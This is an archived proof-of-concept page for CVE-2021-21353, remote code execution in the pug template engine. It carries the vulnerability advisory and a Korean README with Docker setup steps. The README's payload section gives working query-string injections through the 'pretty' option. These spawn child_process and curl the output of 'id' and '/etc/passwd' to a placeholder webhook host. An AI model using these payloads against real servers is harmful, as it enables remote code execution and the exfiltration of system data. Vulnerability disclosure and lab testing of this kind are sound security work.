Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-21353 PoC — Remote code execution in pug

Source
https://github.com/jinsu9758/PUG-RCE-CVE-2021-21353-POC
Associated Vulnerability
Title:Remote code execution in pug (CVE-2021-21353)
Description:Pug is an npm package which is a high-performance template engine. In pug before version 3.0.1, if a remote attacker was able to control the `pretty` option of the pug compiler, e.g. if you spread a user provided object such as the query parameters of a request into the pug template inputs, it was possible for them to achieve remote code execution on the node.js backend. This is fixed in version 3.0.1. This advisory applies to multiple pug packages including "pug", "pug-code-gen". pug-code-gen has a backported fix at version 2.0.3. This advisory is not exploitable if there is no way for un-trusted input to be passed to pug as the `pretty` option, e.g. if you compile templates in advance before applying user input to them, you do not need to upgrade.
Readme
# PUG-RCE (CVE-2021-21353) POC


## 취약점 정보
CVE 번호 : cve-2021-21353  
CVSS 점수 : 8.1  
  
< 취약한 버전 >  
pug_version <= 3.0.0  
2.0.3 < pug-code-gen version,  3.0.0<= pug-code-gen version < 3.0.2

----

## 환경 설정
`git clone https://github.com/jinsu9758/PUG-RCE-CVE-2021-21353-POC.git`  
`cd PUG-RCE-CVE-2021-21353-POC`  
`sudo docker compose up`  

※ 3000번 포트로 접속 가능

----

## Payload
페이로드 테스트  
`?pretty=');console.log('executed');//`  
  
최종 페이로드  
`?pretty=');process.mainModule.constructor._load('child_process').exec('curl -X POST -d \"$(id)\" <webhook_site>');_=('`  
  
`?pretty=');process.mainModule.constructor._load('child_process').exec('curl -X POST -d \"$(cat /etc/passwd)\" <webhook_site>');_=('`
File Snapshot

 [4.0K]  /data/pocs/90fe387b16225f7d9fa8b12ff0b024a424daef16
├── [4.0K]  app
│   ├── [ 303]  index.js
│   ├── [ 173]  package.json
│   └── [4.0K]  views
│       └── [ 119]  template.pug
├── [ 137]  docker-compose.yml
├── [  99]  Dockerfile
└── [ 786]  README.md

2 directories, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →